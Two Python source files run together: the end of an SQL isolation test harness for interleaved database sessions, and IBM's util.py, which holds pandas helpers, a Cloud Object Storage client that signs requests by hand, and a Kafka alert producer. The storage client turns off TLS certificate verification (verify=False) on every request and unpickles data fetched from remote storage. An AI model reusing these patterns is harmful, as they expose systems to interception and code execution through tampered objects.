self.processes[(name, utility_mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, utility_mode, dbname)
return self.processes[(name, utility_mode)]
def quit_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not name.isdigit():
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, utility_mode)].quit()
del self.processes[(name, False)]
def process_command(self, command, output_file):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
dbname = ""
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
sql = m.groups()[2]
sql = sql.lstrip()
# If db_name is specifed , it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
if not flag:
self.get_process(output_file, process_name, dbname=dbname).query(sql.strip())
elif flag == "&":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), True)
elif flag == ">":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), False)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, dbname=dbname).join()
elif flag == "U":
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).query(sql.strip())
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, dbname=dbname)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file):
"""
Processes the given sql file and writes the output
to output file
"""
try:
command = ""
for line in sql_file:
tinctest.logger.info("re.match: %s" %re.match(r"^\d+[q\\<]:$", line))
print >>output_file, line.strip(),
(command_part, dummy, comment) = line.partition("--")
if command_part == "" or command_part == "\n":
print >>output_file
elif command_part.endswith(";\n") or re.match(r"^\d+[q\\<]:$", line):
command += command_part
tinctest.logger.info("Processing command: %s" %command)
self.process_command(command, output_file)
command = ""
else:
command += command_part
for process in self.processes.values():
process.stop()
except:
for process in self.processes.values():
process.terminate()
raise
finally:
for process in self.processes.values():
process.terminate()
# Skipping loading for this model class. Otherwise, by default, whenever this class is imported in sub-classes,
# unittest will load tests for this class as well. If there are sql files in the same folder as the model class,
# the loading mechanism of SQLTestCase will try to construct tests for those sqls which is not intended here.
@tinctest.skipLoading("Model class. This annotation will prevent this class from loading tests when imported in sub-classes")
class SQLIsolationTestCase(SQLTestCase):
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
an tranaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
One difference to SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
SQLIsolationTestCase would output "INSERT 1". As the
SQLIsolationTestCase needs to have a more fine-grained control
over the execution order than possible with PSQL, it uses
the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For eg:, following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
in the middle of the test execution, you can specify a flag 'q' with the session identifier. For eg:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
"""
def get_ans_suffix(self):
""" The method can be overwritten by a subclass to customize
the ans file behavior.
"""
return
def get_output_substitution(self):
""" The method can be overwritten by a subclass to return a list
of regular expression substitutions the output file should
be tranformed with.
This method can be used to unify an output file to
by remove output that is always different as e.g., an
oid in an error message
"""
return
def _transform_output_file(self, output_file):
"""
Transforms the output file based on the output
substitutions provided by the subclass.
The transformations are cached and pre-compiled to
reduce the overhead.
"""
if "_output_transforms" not in dir(self):
self._output_transforms = self.get_output_substitution()
if self._output_transforms != None:
self._output_transforms = [(re.compile(t[0]), t[1]) for t in self._output_transforms]
if self._output_transforms == None or len(self._output_transforms) == 0:
return
contents = ''
with open(output_file, 'r') as f:
contents += f.read()
with open(output_file, "w") as f:
for line in contents.splitlines():
for (p, r) in self._output_transforms:
line2 = p.sub(r, line)
print >>f, line2
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file , runs the sql
against the test case databse (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
def verify_out_file(self, out_file, ans_file):
"""
The ans file might be replaced by a customized ans
file.
"""
def check_valid_suffix(suffix):
if not re.match("[a-zA-Z0-9]+", suffix):
raise Exception("Invalid ans file suffix %s" % suffix)
# Modify the ans file based on the suffix
suffix = self.get_ans_suffix()
if suffix:
check_valid_suffix(suffix)
new_ans_file = ans_file[:-4] + "_" + suffix + ".ans"
if os.path.exists(new_ans_file):
tinctest.logger.debug("Using customized ans file %s for this test" %new_ans_file)
ans_file = new_ans_file
if ans_file is not None:
self._transform_output_file(out_file)
self.test_artifacts.append(ans_file)
# Check if an init file exists in the same location as the sql file
init_files = []
init_file_path = os.path.join(self.get_sql_dir(), 'init_file')
if os.path.exists(init_file_path):
init_files.append(init_file_path)
result = Gpdiff.are_files_equal(out_file, ans_file, match_sub = init_files)
if result == False:
self.test_artifacts.append(out_file.replace('.out', '.diff'))
return result
if __name__ == "__main__":
executor = SQLIsolationExecutor()
executor.process_isolation_file(sys.stdin, sys.stdout)
|
util.py
|
# *****************************************************************************
# © Copyright IBM Corp. 2018. All Rights Reserved.
#
# This program and the accompanying materials
# are made available under the terms of the Apache V2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
#
# *****************************************************************************
import datetime
import datetime as dt
import errno
import hashlib
import hmac
import json
import logging
import logging.config
import os
import random
import re
import string
import sys
import tempfile
import threading
import time
from base64 import b64encode
from urllib.parse import quote, urlparse
import dill as pickle
import pandas as pd
import requests
from lxml import etree
logger = logging.getLogger(__name__)
try:
from confluent_kafka import Producer
except ImportError:
logger.warning('Warning: confluent_kafka is not installed. Publish to MessageHub not supported.')
KAFKA_INSTALLED = False
else:
KAFKA_INSTALLED = True
try:
import ibm_boto3
from ibm_boto3.s3.transfer import S3Transfer
from ibm_botocore.client import Config
except BaseException:
IBMBOTO_INSTALLED = False
logger.info('ibm_boto3 is not installed. Use HMAC credentials to communicate with COS.')
else:
IBMBOTO_INSTALLED = True
FLUSH_PRODUCER_EVERY = 500
MH_USER = os.environ.get('MH_USER')
MH_PASSWORD = os.environ.get('MH_PASSWORD')
MH_BROKERS_SASL = os.environ.get('MH_BROKERS_SASL')
MH_DEFAULT_ALERT_TOPIC = os.environ.get('MH_DEFAULT_ALERT_TOPIC')
MH_CLIENT_ID = 'as-pipeline-alerts-producer'
UNIQUE_EXTENSION_LABEL = '_###IBM_Temporary###'
def setup_logging(log_level=logging.INFO, root_log_level=logging.DEBUG):
logging.config.dictConfig({'version': 1, 'disable_existing_loggers': False, 'formatters': {
'simple': {'format': '%(asctime)s [PID %(process)d] [%(levelname)-7s] %(name)s.%(funcName)s : %(message)s ',
'datefmt': '%Y-%m-%d %I:%M:%S %p'}}, 'handlers': {
'console': {'class': 'logging.StreamHandler', 'formatter': 'simple', 'stream': 'ext://sys.stdout'},
'file': {'class': 'logging.FileHandler', 'filename': 'main.log', 'mode': 'w', 'formatter': 'simple'}},
'loggers': {'analytics_service': {'level': log_level}},
'root': {'level': root_log_level, 'handlers': ['console', 'file']}})
def adjust_probabilities(p_list):
"""
Adjust a list of probabilties to ensure that they sum to 1
"""
if p_list is None or len(p_list) == 0:
out = None
else:
total = sum(p_list)
if total == 1:
out = p_list
elif total == 0:
raise ValueError('Probabilities may not sum to zero')
else:
out = [x / total for x in p_list]
return out
def build_grouper(freq, timestamp, entity_id=None, dimensions=None, custom_calendar_keys=None, ):
"""
Build a pandas grouper from columns and frequecy metadata.
Parameters
-----------
freq : str
pandas frequency string
timestamp: str
name of timestamp column to group by
entity_id: str
column name for the entity_id if entity id is included in group by
e.g. device_id
dimensions: list of strs
column names for the dimensions to be included in group by
e.g. ['company','city']
custom_calendar_keys: list of strs
column names for the custom calendar keys to be included in group by
e.g. ['shift']
"""
grouper = []
if dimensions is None:
dimensions = []
if entity_id is not None:
grouper.append(pd.Grouper(key=entity_id))
grouper.append(pd.Grouper(key=timestamp, freq=freq))
for d in dimensions:
grouper.append(pd.Grouper(key=d))
return grouper
def categorize_args(categories, catch_all, *args):
"""
Separate objects passed as arguments into a dictionary of categories
members of categories are identified by a bool property or by
being instances of a class
example:
categories = [('constant','is_ui_control',None),
('granularity','is_granularity',None),
('function','is_function',None),
('column',None,Column)]
"""
meta = {}
if catch_all is not None:
meta[catch_all] = set()
logger.debug('categorizing arguments')
uncat = set(args)
for (group, attr, cls) in categories:
meta[group] = set()
for a in args:
if attr is not None:
try:
is_group = getattr(a, attr)
except AttributeError:
is_group = False
else:
is_group = False
if is_group:
meta[group].add(a)
uncat.remove(a)
elif cls is not None and isinstance(a, cls):
meta[group].add(a)
uncat.remove(a)
for a in uncat:
meta[catch_all].add(a)
return meta
def compare_dataframes(dfl, dfr, cols=None):
"""
Explain the differences between 2 dataframes
"""
if cols is None:
cols = list(dfl.columns)
differences = 0
trace = ''
if len(dfl.index) != len(dfr.index):
msg = 'Row count: %s vs %s' % (dfl.index, dfr.index)
trace = trace + msg
differences += abs(len(dfl.index) - len(dfr.index))
missing_l = set(cols) - set(dfl.columns)
if len(missing_l) != 0:
msg = 'dfl is missing columns:' % (missing_l)
trace = trace + msg
cols = [x for x in cols if x not in missing_l]
differences += len(missing_l) * len(dfl.index)
missing_r = set(cols) - set(dfr.columns)
if len(missing_r) != 0:
msg = 'dfr is missing columns: %s' % (missing_r)
trace = trace + msg
cols = [x for x in cols if x not in missing_r]
differences += len(missing_r) * len(dfr.index)
dfl = dfl[cols].reindex()
dfr = dfr[cols].reindex()
dfs = {'dfl': dfl, 'dfr': dfr}
df = pd.concat(dfs)
total_rows = len(df.index)
df = df.drop_duplicates(keep=False)
if total_rows - len(df.index) > 0:
msg = 'Rows with different contents:%s' % (total_rows - len(df.index))
trace = trace + msg
differences = differences + total_rows - len(df.index)
return (differences, trace, df)
def reset_df_index(df, auto_index_name='_auto_index_'):
"""
Reset the data dataframe index. Ignore duplicate columns.
"""
# if the dataframe has an auto index, do not place it in the dataframe
if len([x for x in df.index.names if x is not None]) > 0:
drop = False
elif df.index.name is None or df.index.name == auto_index_name:
drop = True
else:
drop = False
# drop any duplicate columns that exist in index and df
try:
df = df.reset_index(inplace=False, drop=drop) # do not propregate
except ValueError:
index_names = get_index_names(df)
dup_names = set(index_names).intersection(set(df.columns))
for i in dup_names:
df = df.drop(columns=[i])
logger.debug('Dropped duplicate column name %s while resetting index', i)
try:
df = df.reset_index(inplace=False, drop=drop) # do not propregate
except ValueError:
msg = ('There is a problem with the dataframe index. '
' Cant reset as reset caused overlap in col names'
' index: %s, cols: %s' % (df.index.names, df.columns))
raise RuntimeError(msg)
return df
def resample(df, time_frequency, timestamp, dimensions=None, agg=None, default_aggregate='last'):
"""
Resample a dataframe to a new time grain / dimensional grain
Parameters:
-----------
df: Pandas dataframe
Dataframe to resample
time_frequency: str
Pandas frequency string
dimensions: list of strs
List of columns to group by
agg : dict
Pandas aggregate dictionary
default_aggregate: str
Default aggregation function to apply for anything not specified in agg
Returns
-------
Pandas dataframe
"""
if dimensions is None:
dimensions = []
if agg is None:
agg = {}
df = df.reset_index()
index_cols = [timestamp]
index_cols.extend(dimensions)
for r in [x for x in df.columns if x not in index_cols]:
try:
agg[r]
except KeyError:
agg[r] = default_aggregate
group_base = [pd.Grouper(key=timestamp, freq=time_frequency)]
for d in dimensions:
group_base.append(pd.Grouper(key=d))
df = df.groupby(group_base).agg(agg)
df.reset_index(inplace=True)
return df
def freq_to_timedelta(freq):
"""
The pandas to_timedelta does not handle the full set of
set of pandas frequency abreviations. Convert to supported
abreviation and the use to_timedelta.
"""
try:
freq = freq.replace('T', 'min')
except AttributeError:
pass
return (pd.to_timedelta(freq))
def randomword(length):
letters = string.ascii_lowercase + string.digits
return ''.join(random.choice(letters) for i in range(length))
def cosSave(obj, bucket, filename, credentials):
"""
Use IAM credentials to write an object to Cloud Object Storage
"""
try:
fhandle, fname = tempfile.mkstemp("cosfile")
os.close(fhandle)
with open(fname, 'wb') as file_obj:
pickle.dump(obj, file_obj)
transfer = getCosTransferAgent(credentials)
transfer.upload_file(fname, bucket, filename)
os.unlink(fname)
except Exception as ex:
logging.exception(ex)
return filename
def cosLoad(bucket, filename, credentials):
"""
Use IAM credentials to read an object from Cloud Object Storage
"""
try:
fhandle, fname = tempfile.mkstemp("cosfile")
os.close(fhandle)
transfer = getCosTransferAgent(credentials)
transfer.download_file(bucket, filename, fname)
answer = None
with open(fname, 'rb') as file_obj:
answer = pickle.load(file_obj)
os.unlink(fname)
return answer
except Exception as ex:
logging.exception(ex)
def getCosTransferAgent(credentials):
"""
Use IAM credentials to obtain a Cloud Object Storage transfer agent object
"""
if IBMBOTO_INSTALLED:
endpoints = requests.get(credentials.get('endpoints')).json()
iam_host = (endpoints['identity-endpoints']['iam-token'])
cos_host = (endpoints['service-endpoints']['cross-region']['us']['public']['us-geo'])
api_key = credentials.get('apikey')
service_instance_id = credentials.get('resource_instance_id')
auth_endpoint = "https://" + iam_host + "/oidc/token"
service_endpoint = "https://" + cos_host
cos = ibm_boto3.client('s3', ibm_api_key_id=api_key, ibm_service_instance_id=service_instance_id,
ibm_auth_endpoint=auth_endpoint, config=Config(signature_version='oauth'),
endpoint_url=service_endpoint)
return S3Transfer(cos)
else:
raise ValueError('Attempting to use IAM credentials to communicate with COS. IBMBOTO is not installed.\
You make use HMAC credentials and the CosClient instead.')
def get_index_names(df):
"""
Get names from either single or multi-part index
"""
if df.index.name is not None:
df_index_names = [df.index.name]
else:
df_index_names = list(df.index.names)
df_index_names = [x for x in df_index_names if x is not None]
return df_index_names
def infer_data_items(expressions):
"""
Examine a pandas expression or list of expressions. Identify data items
in the expressions by looking for df['<data_item>'].
Returns as set of strings.
"""
if not isinstance(expressions, list):
expressions = [expressions]
regex1 = "df\[\'(.+?)\'\]"
regex2 = 'df\[\"(.+?)\"\]'
data_items = set()
for e in expressions:
data_items |= set(re.findall(regex1, e))
data_items |= set(re.findall(regex2, e))
return (data_items)
def get_fn_expression_args(function_metadata, kpi_metadata):
"""
Examine a functions metadata dictionary. Identify data items used
in any expressions that the function has.
"""
expressions = []
args = kpi_metadata.get('input', {})
for (arg, value) in list(args.items()):
if arg == 'expression' and value is not None:
expressions.append(value)
logger.debug('Found expression %s', value)
return infer_data_items(expressions)
def get_fn_scope_sources(scope_key, kpi):
scope_sources = set()
if kpi.get(scope_key):
scope = kpi.get(scope_key)
if scope.get('type') == 'DIMENSIONS':
for dimension_filter in scope.get('dimensions'):
dimension_name = dimension_filter['name']
scope_sources.add(dimension_name)
else:
expression = scope.get('expression')
if expression is not None and '${' in expression:
expression = re.sub(r"\$\{(\w+)\}", r"df['\1']", expression)
scope_sources.update(infer_data_items(expression))
logger.info('scope sources {} for kpi {}'.format(scope_sources, kpi))
return scope_sources
def is_df_mergeable(transformed_df, original_df):
"""
Only merge if the two dataframes have same number of rows and
transformed dataframe has all the columns from the original dataframe
"""
is_mergeable = False
if original_df.shape[0] == transformed_df.shape[0] and set(original_df.index).issubset(transformed_df.index):
is_mergeable = True
return is_mergeable
def log_df_info(df, msg, include_data=False):
"""
Log a debugging entry showing first row and index structure
"""
try:
msg = msg + ' ; df row count: %s ' % (len(df.index))
if df.index.names != [None]:
msg = msg + ' ; index: { %s } ' % (' , '.join(df.index.names))
else:
msg = msg + ' ; index is unnamed'
if include_data:
msg = msg + ' ; 1st row: '
try:
cols = df.head(1).squeeze().to_dict()
for key, value in list(cols.items()):
msg = msg + '%s : %s, ' % (key, value)
except AttributeError:
msg = msg + str(df.head(1))
else:
msg = msg + ' ; columns: { %s }' % (' , '.join(list(df.columns)))
logger.debug(msg)
return msg
except Exception:
logger.warning('dataframe contents not logged due to an unknown logging error')
return ''
def asList(x):
if not isinstance(x, list):
x = [x]
return x
class CosClient:
"""
Cloud Object Storage client
"""
def __init__(self, credentials):
self._cod_hmac_access_key_id = credentials['objectStorage']['username']
self._cod_hmac_secret_access_key = credentials['objectStorage']['password']
self._cos_region = credentials['objectStorage']['region']
self._cos_endpoint = credentials['config']['objectStorageEndpoint']
if self._cos_region is None or len(self._cos_region.strip()) == 0:
self._cos_region = 'any-region'
# hashing and signing methods
def _hash(self, key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
# region is a wildcard value that takes the place of the AWS region value
# as COS doen't use the same conventions for regions, this parameter can accept any string
def _create_signature_key(self, key, datestamp, region, service):
keyDate = self._hash(('AWS4' + key).encode('utf-8'), datestamp)
keyString = self._hash(keyDate, region)
keyService = self._hash(keyString, service)
keySigning = self._hash(keyService, 'aws4_request')
return keySigning
def _cos_api_request(self, http_method, bucket, key, request_parameters=None, payload='', extra_headers=None,
binary=False):
if extra_headers is None:
extra_headers = {}
# it seems region is not used by IBM COS and can be any string (but cannot be None below still)
if any([(var is None or len(var.strip()) == 0) for var in
[self._cod_hmac_access_key_id, self._cod_hmac_secret_access_key, self._cos_endpoint, bucket]]):
logger.warning('write COS is disabled because not all COS config environment variables are set')
return None
# assemble the standardized request
time = datetime.datetime.utcnow()
timestamp = time.strftime('%Y%m%dT%H%M%SZ')
datestamp = time.strftime('%Y%m%d')
url = urlparse(self._cos_endpoint)
host = url.netloc
payload_hash = hashlib.sha256(str.encode(payload) if isinstance(payload, str) else payload).hexdigest()
standardized_resource = '/'
if bucket is not None:
standardized_resource += bucket
if key is not None:
standardized_resource += '/' + key
if request_parameters is None:
standardized_querystring = ''
else:
standardized_querystring = '&'.join(
['%s=%s' % (quote(k, safe=''), quote(v, safe='')) for k, v in request_parameters.items()])
all_headers = {'host': host, 'x-amz-content-sha256': payload_hash, 'x-amz-date': timestamp}
all_headers.update({k.lower(): v for k, v in extra_headers.items()})
standardized_headers = ''
for header in sorted(all_headers.keys()):
standardized_headers += '%s:%s\n' % (header, all_headers[header])
signed_headers = ';'.join(sorted(all_headers.keys()))
# standardized_headers = 'host:' + host + '\n' + 'x-amz-content-sha256:' + payload_hash + '\n' + 'x-amz-date:' + timestamp + '\n'
# signed_headers = 'host;x-amz-content-sha256;x-amz-date'
standardized_request = (
http_method + '\n' + standardized_resource + '\n' + standardized_querystring + '\n' + standardized_headers + '\n' + signed_headers + '\n' + payload_hash)
# logging.debug('standardized_request=\n%s' % standardized_request)
# assemble string-to-sign
hashing_algorithm = 'AWS4-HMAC-SHA256'
credential_scope = datestamp + '/' + self._cos_region + '/' + 's3' + '/' + 'aws4_request'
sts = (hashing_algorithm + '\n' + timestamp + '\n' + credential_scope + '\n' + hashlib.sha256(
str.encode(standardized_request)).hexdigest())
# logging.debug('string-to-sign=\n%s' % sts)
# generate the signature
signature_key = self._create_signature_key(self._cod_hmac_secret_access_key, datestamp, self._cos_region, 's3')
signature = hmac.new(signature_key, (sts).encode('utf-8'), hashlib.sha256).hexdigest()
# logging.debug('signature=\n%s' % signature)
# assemble all elements into the 'authorization' header
v4auth_header = (
hashing_algorithm + ' ' + 'Credential=' + self._cod_hmac_access_key_id + '/' + credential_scope + ', ' + 'SignedHeaders=' + signed_headers + ', ' + 'Signature=' + signature)
# logging.debug('v4auth_header=\n%s' % v4auth_header)
# the 'requests' package autmatically adds the required 'host' header
headers = all_headers.copy()
headers.pop('host')
headers['Authorization'] = v4auth_header
# headers = {'x-amz-content-sha256': payload_hash, 'x-amz-date': timestamp, 'Authorization': v4auth_header}
if standardized_querystring == '':
request_url = self._cos_endpoint + standardized_resource
else:
request_url = self._cos_endpoint + standardized_resource + '?' + standardized_querystring
# logging.debug('request_url=%s' % request_url)
if http_method == 'GET':
resp = requests.get(request_url, headers=headers, timeout=30, verify=False)
elif http_method == 'DELETE':
resp = requests.delete(request_url, headers=headers, timeout=30, verify=False)
elif http_method == 'POST':
resp = requests.post(request_url, headers=headers, data=payload, timeout=30, verify=False)
elif http_method == 'PUT':
resp = requests.put(request_url, headers=headers, data=payload, timeout=30, verify=False)
else:
raise RuntimeError('unsupported_http_method=%s' % http_method)
if resp.status_code != requests.codes.ok and not (
resp.status_code == requests.codes.no_content and http_method == 'DELETE'):
logger.warning('error cos_api_request: request_url=%s, http_method=%s, status_code=%s, response_text=%s' % (
request_url, http_method, str(resp.status_code), str(resp.text)))
return None
return resp.content if binary else resp.text
def cos_get(self, key, bucket, request_parameters=None, binary=False):
response = self._cos_api_request('GET', bucket=bucket, key=key, request_parameters=request_parameters,
binary=binary)
if response is not None:
response = pickle.loads(response)
return response
def cos_find(self, prefix, bucket):
result = self.cos_get(key=None, bucket=bucket, request_parameters={'list-type': '2', 'prefix': prefix})
if result is None:
return []
root = etree.fromstring(str.encode(result))
return [elem.text for elem in root.findall('Contents/Key', root.nsmap)]
def cos_put(self, key, payload, bucket, binary=False, serialize=True):
if payload is not None:
if serialize:
payload = pickle.dumps(payload)
else:
payload = ''
return self._cos_api_request('PUT', bucket=bucket, key=key, payload=payload, binary=binary)
def cos_delete(self, key, bucket):
return self._cos_api_request('DELETE', bucket=bucket, key=key)
def cos_delete_multiple(self, keys, bucket):
if keys is None or len(keys) == 0:
return ''
payload = '<?xml version="1.0" encoding="UTF-8"?><Delete>'
for key in keys:
payload += '<Object><Key>%s</Key></Object>' % key
payload += '</Delete>'
md5 = hashlib.md5(str.encode(payload)).digest()
base64 = b64encode(md5).decode()
logger.debug('content-md5: %s' % base64)
extra_headers = {'Content-Type': 'text/plain; charset=utf-8', 'Content-MD5': base64}
request_parameters = {'delete': ''}
return self._cos_api_request('POST', bucket=bucket, key=None, payload=payload,
request_parameters=request_parameters, extra_headers=extra_headers)
class MemoryOptimizer:
"""
Util class used to optimize the pipeline memory consumption using native Pandas downcasting
"""
def printCurrentMemoryConsumption(self, df):
logger.info('Memory consumed by the data frame: \n %s' % df.memory_usage(deep=True))
def printUsagePerType(self, df):
for dtype in ['float', 'int', 'object']:
selected_dtype = df.select_dtypes(include=[dtype])
mean_usage_b = selected_dtype.memory_usage(deep=True).mean()
mean_usage_mb = mean_usage_b / 1024 ** 2
logger.info("Average memory usage for {} columns: {:03.2f} MB".format(dtype, mean_usage_mb))
def downcastInteger(self, df):
df_new = df.copy()
logger.info('Applying downcast to Integer columns.')
try:
df_int = df_new.select_dtypes(include=['int'])
if not df_int.empty:
df_converted = df_int.apply(pd.to_numeric, downcast='unsigned')
for col in df_converted.columns:
df_new[col] = df_converted[col]
except Exception:
logger.warning('Not able to downcast Integer')
return df_new
return df_new
def downcastFloat(self, df, precison='float'):
df_new = df.copy()
logger.info('Applying downcast to Float columns.')
try:
df_float = df_new.select_dtypes(include=['float'])
if not df_float.empty:
df_converted = df_float.apply(pd.to_numeric, downcast=precison)
for col in df_converted.columns:
df_new[col] = df_converted[col]
except Exception:
logger.warning('Not able to downcast Float types')
return df_new
return df_new
def getColumnsForCategorization(self, df, threshold=0.5):
"""
It generates a list of columns that are elegible to be categorized.
The column name is printed if the number of unique values is proportionally greater than 50% of the total number of rows.
Threshold is customized.
"""
df_new = df.select_dtypes(include=['object']).copy()
lst_columns = []
for col in df_new.columns:
num_unique_values = len(df_new[col].unique())
num_total_values = len(df_new[col])
if num_unique_values / num_total_values < threshold:
logger.info('Column elegible for categorization: %s' % col)
lst_columns.append(col)
return lst_columns
def downcastString(self, df, lst_columns):
"""
It converts a data frame column type object into a categorical type
"""
logger.info('Applying downcast to String columns. %s' % str(lst_columns))
df_new = df.select_dtypes(include=['object']).copy()
try:
for col in lst_columns:
df_new.loc[:, col] = df_new[col].astype('category')
except Exception:
logger.warning('Not able to downcast String to category')
return df
return df_new
def downcastNumeric(self, df):
logger.info('Optimizing memory. Before applying downcast.')
self.printUsagePerType(df)
self.printCurrentMemoryConsumption(df)
df_new = self.downcastInteger(df)
df_new = self.downcastFloat(df_new)
logger.info('Optimizing memory. After applying downcast.')
self.printUsagePerType(df_new)
self.printCurrentMemoryConsumption(df_new)
return df_new
class MessageHub:
MH_CA_CERT_PATH = '/etc/ssl/certs/eventstreams.pem'
MH_CA_CERT = os.environ.get('MH_CA_CERT')
def _delivery_report(err, msg):
""" Called once for each message produced to indicate delivery result.
Triggered by poll() or flush(). """
if err is not None:
logger.warning('Message delivery failed: {}'.format(err))
# else:
# logger.info('Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))
def produce_batch_alert_to_default_topic(self, key_and_msg):
self.produce_batch(topic=MH_DEFAULT_ALERT_TOPIC, key_and_msg=key_and_msg)
def produce_batch(self, topic, key_and_msg):
start_time = dt.datetime.now()
if topic is None or len(topic) == 0 or key_and_msg is None:
logger.warning('Default alert topic name not present. Skipping alerts generation to the queues.')
return
counter = 0
producer = None
for key, msg in key_and_msg:
producer = self.produce(topic, msg=msg, key=key, producer=producer)
counter += 1
if counter % FLUSH_PRODUCER_EVERY == 0:
# Wait for any outstanding messages to be delivered and delivery report
# callbacks to be triggered.
producer.flush()
logger.info('Number of alert produced so far : %d (%s)' % (counter, topic))
if producer is not None:
producer.flush()
end_time = dt.datetime.now()
logger.info("Total alerts produced to message hub = %d " % len(key_and_msg))
logger.info("Total time taken to produce the alert to message hub = %s seconds." % (
end_time - start_time).total_seconds())
def produce(self, topic, msg, key=None, producer=None, callback=_delivery_report):
if topic is None or len(topic) == 0 or msg is None:
return
options = {'sasl.username': MH_USER, 'sasl.password': MH_PASSWORD, 'bootstrap.servers': MH_BROKERS_SASL,
'security.protocol': 'SASL_SSL', # 'ssl.ca.location': '/etc/ssl/certs/', # ubuntu
'ssl.ca.location': self.MH_CA_CERT_PATH, 'sasl.mechanisms': 'PLAIN', 'api.version.request': True,
'broker.version.fallback': '0.10.2.1', 'log.connection.close': False,
'client.id': MH_CLIENT_ID + '-' + randomword(4)}
if KAFKA_INSTALLED:
if producer is None:
producer = Producer(options)
# Asynchronously produce a message, the delivery report callback
# will be triggered from poll() above, or flush() below, when the message has
# been successfully delivered or failed permanently.
producer.produce(topic, value=msg, key=key, callback=callback)
# Trigger any available delivery report callbacks from previous produce() calls
producer.poll(0)
# Wait for any outstanding messages to be delivered and delivery report
# callbacks to be triggered.
# producer.flush()
else:
logger.info('Topic %s : %s' % (topic, msg))
return producer
def mkdir_p(self, path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def safe_open_w(self):
"""
Open "MH_CA_CERT_PATH" for writing, creating the parent directories as needed.
"""
